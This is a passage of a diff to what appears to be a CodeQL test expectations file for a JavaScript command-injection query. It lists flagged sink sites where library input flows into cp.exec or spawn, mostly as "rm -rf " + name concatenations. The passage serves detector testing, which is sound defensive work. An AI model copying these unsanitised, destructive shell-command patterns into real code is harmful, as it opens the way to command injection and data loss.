"rm -rf " + id(n) | lib/lib.js:339:39:339:39 | n | lib/lib.js:340:22:340:26 | id(n) | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:339:39:339:39 | n | library input | lib/lib.js:340:2:340:27 | cp.exec ... id(n)) | shell command | +| lib/lib.js:351:10:351:27 | "rm -rf " + unsafe | lib/lib.js:349:29:349:34 | unsafe | lib/lib.js:351:22:351:27 | unsafe | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:349:29:349:34 | unsafe | library input | lib/lib.js:351:2:351:28 | cp.exec ... unsafe) | shell command | +| lib/lib.js:406:10:406:25 | "rm -rf " + name | lib/lib.js:405:39:405:42 | name | lib/lib.js:406:22:406:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:405:39:405:42 | name | library input | lib/lib.js:406:2:406:26 | cp.exec ... + name) | shell command | +| lib/lib.js:415:10:415:25 | "rm -rf " + name | lib/lib.js:414:40:414:43 | name | lib/lib.js:415:22:415:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:415:2:415:26 | cp.exec ... + name) | shell command | +| lib/lib.js:417:28:417:31 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:417:28:417:31 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:417:2:417:66 | cp.exec ... => {}) | shell command | +| lib/lib.js:418:25:418:28 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:418:25:418:28 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:418:2:418:45 | cp.spaw ... true}) | shell command | +| lib/lib.js:419:32:419:35 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:419:32:419:35 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:419:2:419:52 | cp.exec ... true}) | shell command | +| lib/lib.js:420:29:420:32 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:420:29:420:32 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:420:2:420:49 | cp.spaw ... true}) | shell command | +| lib/lib.js:424:24:424:27 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:424:24:424:27 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:424:2:424:40 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:426:11:426:14 | name | lib/lib.js:414:40:414:43 | name | lib/lib.js:426:11:426:14 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:427:14:427:16 | arr | lib/lib.js:414:40:414:43 | name | lib/lib.js:427:14:427:16 | arr | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:427:2:427:28 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:428:14:428:58 | build(" ... + '-') | lib/lib.js:414:40:414:43 | name | lib/lib.js:428:14:428:58 | build(" ... + '-') | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:436:19:436:22 | last | lib/lib.js:414:40:414:43 | name | lib/lib.js:436:19:436:22 | last | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:414:40:414:43 | name | library input | lib/lib.js:428:2:428:70 | spawn(" ... WN_OPT) | shell command | +| lib/lib.js:442:12:442:27 | "rm -rf " + name | lib/lib.js:441:39:441:42 | name | lib/lib.js:442:24:442:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:441:39:441:42 | name | library input | lib/lib.js:442:2:442:28 | asyncEx ... + name) | shell command | +| lib/lib.js:447:13:447:28 | "rm -rf " + name | lib/lib.js:446:20:446:23 | name | lib/lib.js:447:25:447:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:446:20:446:23 | name | library input | lib/lib.js:447:3:447:29 | asyncEx ... + name) | shell command | +| lib/lib.js:478:27:478:46 | config.installedPath | lib/lib.js:477:39:477:44 | config | lib/lib.js:478:27:478:46 | config.installedPath | This path concatenation which depends on $@ is later used in a $@. | lib/lib.js:477:39:477:44 | config | library input | lib/lib.js:479:12:479:20 | exec(cmd) | shell command | +| lib/lib.js:483:13:483:33 | ' my na ... + name | lib/lib.js:482:40:482:43 | name | lib/lib.js:483:30:483:33 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:482:40:482:43 | name | library input | lib/lib.js:485:2:485:20 | cp.exec(cmd + args) | shell command | +| lib/lib.js:499:19:499:34 | "rm -rf " + name | lib/lib.js:498:45:498:48 | name | lib/lib.js:499:31:499:34 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:498:45:498:48 | name | library input | lib/lib.js:499:3:499:35 | MyThing ... + name) | shell command | +| lib/lib.js:510:10:510:25 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:510:22:510:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:510:2:510:26 | cp.exec ... + name) | shell command | +| lib/lib.js:513:11:513:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:513:23:513:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:513:3:513:27 | cp.exec ... + name) | shell command | +| lib/lib.js:519:11:519:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:519:23:519:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:519:3:519:27 | cp.exec ... + name) | shell command | +| lib/lib.js:525:11:525:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:525:23:525:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:525:3:525:27 | cp.exec ... + name) | shell command | +| lib/lib.js:531:11:531:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:531:23:531:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:531:3:531:27 | cp.exec ... + name) | shell command | +| lib/lib.js:537:11:537:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:537:23:537:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:537:3:537:27 | cp.exec ... + name) | shell command | +| lib/lib.js:543:11:543:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:543:23:543:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:543:3:543:27 | cp.exec ... + name) | shell command | +| lib/lib.js:545:11:545:26 | "rm -rf " + name | lib/lib.js:509:39:509:42 | name | lib/lib.js:545:23:545:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:509:39:509:42 | name | library input | lib/lib.js:545:3:545:27 | cp.exec ... + name) | shell command | +| lib/lib.js:552:23:552:26 | args | lib/lib.js:550:39:550:42 | name | lib/lib.js:552:23:552:26 | args | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | +| lib/lib.js:555:33:555:36 | name | lib/lib.js:550:39:550:42 | name | lib/lib.js:555:33:555:36 | name | This shell argument which depends on $@ is later used in a $@. | lib/lib.js:550:39:550:42 | name | library input | lib/lib.js:552:9:552:38 | cp.spaw ... wnOpts) | shell command | +| lib/lib.js:560:14:560:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:560:26:560:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:560:9:560:30 | exec("r ... + name) | shell command | +| lib/lib.js:562:14:562:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:562:26:562:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:562:9:562:30 | exec("r ... + name) | shell command | +| lib/lib.js:566:14:566:29 | "rm -rf " + name | lib/lib.js:558:41:558:44 | name | lib/lib.js:566:26:566:29 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:558:41:558:44 | name | library input | lib/lib.js:566:9:566:30 | exec("r ... + name) | shell command | +| lib/lib.js:573:10:573:25 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:573:22:573:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:573:2:573:26 | cp.exec ... + name) | shell command | +| lib/lib.js:579:13:579:28 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:579:25:579:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:579:5:579:29 | cp.exec ... + name) | shell command | +| lib/lib.js:590:17:590:32 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:590:29:590:32 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:590:9:590:33 | cp.exec ... + name) | shell command | +| lib/lib.js:593:13:593:28 | "rm -rf " + name | lib/lib.js:572:41:572:44 | name | lib/lib.js:593:25:593:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:572:41:572:44 | name | library input | lib/lib.js:593:5:593:29 | cp.exec ... + name) | shell command | +| lib/lib.js:609:10:609:25 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:609:22:609:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:609:2:609:26 | cp.exec ... + name) | shell command | +| lib/lib.js:626:17:626:32 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:626:29:626:32 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:626:9:626:33 | cp.exec ... + name) | shell command | +| lib/lib.js:629:13:629:28 | "rm -rf " + name | lib/lib.js:608:42:608:45 | name | lib/lib.js:629:25:629:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:608:42:608:45 | name | library input | lib/lib.js:629:5:629:29 | cp.exec ... + name) | shell command | +| lib/lib.js:633:18:633:68 | "'" + n ... ) + "'" | lib/lib.js:632:38:632:41 | name | lib/lib.js:633:24:633:62 | name.re ... '\\\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:632:38:632:41 | name | library input | lib/lib.js:634:2:634:31 | cp.exec ... itized) | shell command | +| lib/lib.js:634:10:634:30 | "rm -rf ... nitized | lib/lib.js:632:38:632:41 | name | lib/lib.js:634:22:634:30 | sanitized | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:632:38:632:41 | name | library input | lib/lib.js:634:2:634:31 | cp.exec ... itized) | shell command | +| lib/subLib2/compiled-file.ts:4:13:4:28 | "rm -rf " + name | lib/subLib2/compiled-file.ts:3:26:3:29 | name | lib/subLib2/compiled-file.ts:4:25:4:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/compiled-file.ts:3:26:3:29 | name | library input | lib/subLib2/compiled-file.ts:4:5:4:29 | cp.exec ... + name) | shell command | +| lib/subLib2/special-file.js:4:10:4:25 | "rm -rf " + name | lib/subLib2/special-file.js:3:28:3:31 | name | lib/subLib2/special-file.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib2/special-file.js:3:28:3:31 | name | library input | lib/subLib2/special-file.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib3/my-file.ts:4:10:4:25 | "rm -rf " + name | lib/subLib3/my-file.ts:3:28:3:31 | name | lib/subLib3/my-file.ts:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib3/my-file.ts:3:28:3:31 | name | library input | lib/subLib3/my-file.ts:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib4/subsub.js:4:10:4:25 | "rm -rf " + name | lib/subLib4/index.js:6:32:6:35 | name | lib/subLib4/subsub.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib4/index.js:6:32:6:35 | name | library input | lib/subLib4/subsub.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib/amdSub.js:4:10:4:25 | "rm -rf " + name | lib/subLib/amdSub.js:3:28:3:31 | name | lib/subLib/amdSub.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/amdSub.js:3:28:3:31 | name | library input | lib/subLib/amdSub.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib/index.js:4:10:4:25 | "rm -rf " + name | lib/subLib/index.js:3:28:3:31 | name | lib/subLib/index.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/index.js:3:28:3:31 | name | library input | lib/subLib/index.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/subLib/index.js:8:10:8:25 | "rm -rf " + name | lib/subLib/index.js:7:32:7:35 | name | lib/subLib/index.js:8:22:8:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/subLib/index.js:7:32:7:35 | name | library input | lib/subLib/index.js:8:2:8:26 | cp.exec ... + name) | shell command | +| lib/subLib/index.js:14:22:14:24 | arr | lib/subLib/index.js:13:44:13:46 | arr | lib/subLib/index.js:14:22:14:24 | arr | This shell argument which depends on $@ is later used in a $@. | lib/subLib/index.js:13:44:13:46 | arr | library input | lib/subLib/index.js:14:5:14:40 | cp.spaw ... true}) | shell command | edges | lib/isImported.js:5:49:5:52 | name | lib/isImported.js:6:22:6:25 | name | provenance | | | lib/lib2.js:3:28:3:31 | name | lib/lib2.js:4:22:4:25 | name | provenance | | | lib/lib2.js:7:32:7:35 | name | lib/lib2.js:8:22:8:25 | name | provenance | | -| lib/lib.js:3:28:3:31 | name | lib/lib.js:4:22:4:25 | name | provenance | | +| lib/lib.js:3:33:3:36 | name | lib/lib.js:4:22:4:25 | name | provenance | | | lib/lib.js:10:32:10:35 | name | lib/lib.js:11:22:11:25 | name | provenance | | | lib/lib.js:14:36:14:39 | name | lib/lib.js:15:22:15:25 | name | provenance | | | lib/lib.js:19:34:19:37 | name | lib/lib.js:20:22:20:25 | name | provenance | | @@ -100,7 +207,7 @@ edges | lib/lib.js:436:19:436:22 | last | lib/lib.js:436:10:436:12 | [post update] arr [ArrayElement] | provenance | | | lib/lib.js:441:39:441:42 | name | lib/lib.js:442:24:442:27 | name | provenance | | | lib/lib.js:446:20:446:23 | name | lib/lib.js:447:25:447:28 | name | provenance | | -| lib/lib.js:477:33:477:38 | config | lib/lib.js:478:27:478:32 | config | provenance | | +| lib/lib.js:477:39:477:44 | config | lib/lib.js:478:27:478:32 | config | provenance | | | lib/lib.js:478:27:478:32 | config | lib/lib.js:478:27:478:46 | config.installedPath | provenance | | | lib/lib.js:482:40:482:43 | name | lib/lib.js:483:30:483:33 | name | provenance | | | lib/lib.js:498:45:498:48 | name | lib/lib.js:499:31:499:34 | name | provenance | | @@ -149,7 +256,7 @@ nodes | lib/lib2.js:4:22:4:25 | name | semmle.label | name | | lib/lib2.js:7:32:7:35 | name | semmle.label | name | | lib/lib2.js:8:22:8:25 | name | semmle.label | name | -| lib/lib.js:3:28:3:31 | name | semmle.label | name | +| lib/lib.js:3:33:3:36 | name | semmle.label | name | | lib/lib.js:4:22:4:25 | name | semmle.label | name | | lib/lib.js:10:32:10:35 | name | semmle.label | name | | lib/lib.js:11:22:11:25 | name | semmle.label | name | @@ -285,7 +392,7 @@ nodes | lib/lib.js:442:24:442:27 | name | semmle.label | name | | lib/lib.js:446:20:446:23 | name | semmle.label | name | | lib/lib.js:447:25:447:28 | name | semmle.label | name | -| lib/lib.js:477:33:477:38 | config | semmle.label | config | +| lib/lib.js:477:39:477:44 | config | semmle.label | config | | lib/lib.js:478:27:478:32 | config | semmle.label | config | | lib/lib.js:478:27:478:46 | config.installedPath | semmle.label | config.installedPath | | lib/lib.js:482:40:482:43 | name | semmle.label | name | @@ -348,110 +455,3 @@ subpaths | lib/lib.js:251:27:251:30 | name | lib/lib.js:239:28:239:28 | s | lib/lib.js:245:9:245:9 | s | lib/lib.js:251:16:251:31 | cleanInput(name) | | lib/lib.js:340:25:340:25 | n | lib/lib.js:329:13:329:13 | x | lib/lib.js:330:9:330:9 | x | lib/lib.js:340:22:340:26 | id(n) | | lib/lib.js:428:28:428:57 | (name ? ... ) + '-' | lib/lib.js:431:23:431:26 | last | lib/lib.js:437:9:437:11 | arr [ArrayElement] | lib/lib.js:428:14:428:58 | build(" ... + '-') | -#select -| lib/isImported.js:6:10:6:25 | "rm -rf " + name | lib/isImported.js:5:49:5:52 | name | lib/isImported.js:6:22:6:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/isImported.js:5:49:5:52 | name | library input | lib/isImported.js:6:2:6:26 | cp.exec ... + name) | shell command | -| lib/lib2.js:4:10:4:25 | "rm -rf " + name | lib/lib2.js:3:28:3:31 | name | lib/lib2.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib2.js:3:28:3:31 | name | library input | lib/lib2.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/lib2.js:8:10:8:25 | "rm -rf " + name | lib/lib2.js:7:32:7:35 | name | lib/lib2.js:8:22:8:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib2.js:7:32:7:35 | name | library input | lib/lib2.js:8:2:8:26 | cp.exec ... + name) | shell command | -| lib/lib.js:4:10:4:25 | "rm -rf " + name | lib/lib.js:3:28:3:31 | name | lib/lib.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:3:28:3:31 | name | library input | lib/lib.js:4:2:4:26 | cp.exec ... + name) | shell command | -| lib/lib.js:11:10:11:25 | "rm -rf " + name | lib/lib.js:10:32:10:35 | name | lib/lib.js:11:22:11:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:10:32:10:35 | name | library input | lib/lib.js:11:2:11:26 | cp.exec ... + name) | shell command | -| lib/lib.js:15:10:15:25 | "rm -rf " + name | lib/lib.js:14:36:14:39 | name | lib/lib.js:15:22:15:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:14:36:14:39 | name | library input | lib/lib.js:15:2:15:26 | cp.exec ... + name) | shell command | -| lib/lib.js:20:10:20:25 | "rm -rf " + name | lib/lib.js:19:34:19:37 | name | lib/lib.js:20:22:20:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:19:34:19:37 | name | library input | lib/lib.js:20:2:20:26 | cp.exec ... + name) | shell command | -| lib/lib.js:27:10:27:25 | "rm -rf " + name | lib/lib.js:26:35:26:38 | name | lib/lib.js:27:22:27:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:26:35:26:38 | name | library input | lib/lib.js:27:2:27:26 | cp.exec ... + name) | shell command | -| lib/lib.js:35:11:35:26 | "rm -rf " + name | lib/lib.js:34:14:34:17 | name | lib/lib.js:35:23:35:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:34:14:34:17 | name | library input | lib/lib.js:35:3:35:27 | cp.exec ... + name) | shell command | -| lib/lib.js:38:11:38:26 | "rm -rf " + name | lib/lib.js:37:13:37:16 | name | lib/lib.js:38:23:38:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:37:13:37:16 | name | library input | lib/lib.js:38:3:38:27 | cp.exec ... + name) | shell command | -| lib/lib.js:41:11:41:26 | "rm -rf " + name | lib/lib.js:40:6:40:9 | name | lib/lib.js:41:23:41:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:40:6:40:9 | name | library input | lib/lib.js:41:3:41:27 | cp.exec ... + name) | shell command | -| lib/lib.js:50:35:50:50 | "rm -rf " + name | lib/lib.js:49:31:49:34 | name | lib/lib.js:50:47:50:50 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:49:31:49:34 | name | library input | lib/lib.js:50:2:50:51 | require ... + name) | shell command | -| lib/lib.js:54:13:54:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:54:25:54:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:55:2:55:14 | cp.exec(cmd1) | shell command | -| lib/lib.js:57:13:57:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:57:25:57:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:59:3:59:14 | cp.exec(cmd) | shell command | -| lib/lib.js:65:10:65:25 | "rm -rf " + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:65:2:65:26 | cp.exec ... + name) | shell command | -| lib/lib.js:69:10:69:47 | "for fo ... la end" | lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:69:2:69:48 | cp.exec ... a end") | shell command | -| lib/lib.js:71:10:71:31 | "cat /f ... + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:71:2:71:32 | cp.exec ... + name) | shell command | -| lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | lib/lib.js:64:41:64:44 | name | lib/lib.js:73:21:73:24 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") | shell command | -| lib/lib.js:75:10:75:29 | "cat '" + name + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:75:20:75:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:75:2:75:30 | cp.exec ... + "'") | shell command | -| lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:77:28:77:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:77:2:77:38 | cp.exec ... + "'") | shell command | -| lib/lib.js:83:10:83:25 | "rm -rf " + name | lib/lib.js:82:35:82:38 | name | lib/lib.js:83:22:83:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:83:2:83:26 | cp.exec ... + name) | shell command | -| lib/lib.js:86:13:86:16 | name | lib/lib.js:82:35:82:38 | name | lib/lib.js:86:13:86:16 | name | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) | shell command | -| lib/lib.js:89:21:89:24 | name | lib/lib.js:82:35:82:38 | name | lib/lib.js:89:21:89:24 | name | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:89:2:89:36 | cp.exec ... n(" ")) | shell command | -| lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | lib/lib.js:82:35:82:38 | name | lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) | shell command | -| lib/lib.js:98:35:98:38 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:98:35:98:38 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:98:2:98:40 | cp.exec ... name)) | shell command | -| lib/lib.js:100:37:100:40 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:100:37:100:40 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:100:2:100:42 | cp.exec ... name)) | shell command | -| lib/lib.js:102:46:102:49 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:102:46:102:49 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:102:2:102:51 | cp.exec ... name)) | shell command | -| lib/lib.js:108:41:108:44 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:108:41:108:44 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:108:2:108:46 | cp.exec ... name)) | shell command | -| lib/lib.js:112:10:112:25 | "rm -rf " + name | lib/lib.js:111:34:111:37 | name | lib/lib.js:112:22:112:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:111:34:111:37 | name | library input | lib/lib.js:112:2:112:26 | cp.exec ... + name) | shell command | -| lib/lib.js:121:10:121:25 | "rm -rf " + name | lib/lib.js:120:33:120:36 | name | lib/lib.js:121:22:121:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:120:33:120:36 | name | library input | lib/lib.js:121:2:121:26 | cp.exec ... + name) | shell command | -| lib/lib.js:131:11:131:26 | "rm -rf " + name | lib/lib.js:130:6:130:9 | name | lib/lib.js:131:23:131:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:130:6:130:9 | name | library input | lib/lib.js:131:3:131:27 | cp.exec ... + name) | shell command | -| lib/lib.js:149:12:149:27 | "rm -rf " + name | lib/lib.js:148:37:148:40 | name | lib/lib.js:149:24:149:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:148:37:148:40 | name | library input | lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | shell command | -| lib/lib.js:161:13:161:28 | "rm -rf " + name | lib/lib.js:155:38:155:41 | name | lib/lib.js:161:25:161:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:155:38:155:41 | name | library input | lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | shell command | -| lib/lib.js:173:10:173:23 | "fo \| " + name | lib/lib.js:170:41:170:44 | name | lib/lib.js:173:20:173:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:170:41:170:44 | name | library input | lib/lib.js:173:2:173:24 | cp.exec ... + name) | shell command | -| lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | lib/lib.js:177:38:177:41 | name | lib/lib.js:181:21:181:46 | name.re ... "'\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command | -| lib/lib.js:182:10:182:27 | "rm -rf " + broken | lib/lib.js:177:38:177:41 | name | lib/lib.js:182:22:182:27 | broken | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command | -| lib/lib.js:187:10:187:25 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:187:22:187:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:187:2:187:26 | cp.exec ... + name) | shell command | -| lib/lib.js:190:11:190:26 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:190:23:190:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:190:3:190:27 | cp.exec ... + name) | shell command | -| lib/lib.js:197:10:197:25 | "rm -rf " + name | lib/lib.js:196:45:196:48 | name | lib/lib.js:197:22:197:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:196:45:196:48 | name | library input | lib/lib.js:197:2:197:26 | cp.exec ... + name) | shell command | -| lib/lib.js:200:11:200:26 | "rm -rf " + name | lib/lib.js:196:45:196:48 | name | lib/lib.js:200:23:200:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:196:45:196:48 | name | library input | lib/lib.js:200:3:200:27 | cp.exec ... + name) | shell command | -| lib/lib.js:207:10:207:25 | "rm -rf " + name | lib/lib.js:206:45:206:48 | name | lib/lib.js:207:22:207:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:206:45:206:48 | name | library input | lib/lib.js:207:2:207:26 | cp.exec ... + name) | shell command | -| lib/lib.js:212:11:212:26 | "rm -rf " + name | lib/lib.js:206:45:206:48 | name | lib/lib.js:212:23:212:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:206:45:206:48 | name | library input | lib/lib.js:212:3:212:27 | cp.exec ... + name) | shell command | -| lib/lib.js:217:10:217:25 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:217:22:217:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:217:2:217:26 | cp.exec ... + name) | shell command | -| lib/lib.js:220:11:220:26 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:220:23:220:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:220:3:220:27 | cp.exec ... + name) | shell command | -| lib/lib.js:224:10:224:25 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:224:22:224:25 | name | This string concatenation which depends on $@ is later used in a $@. | 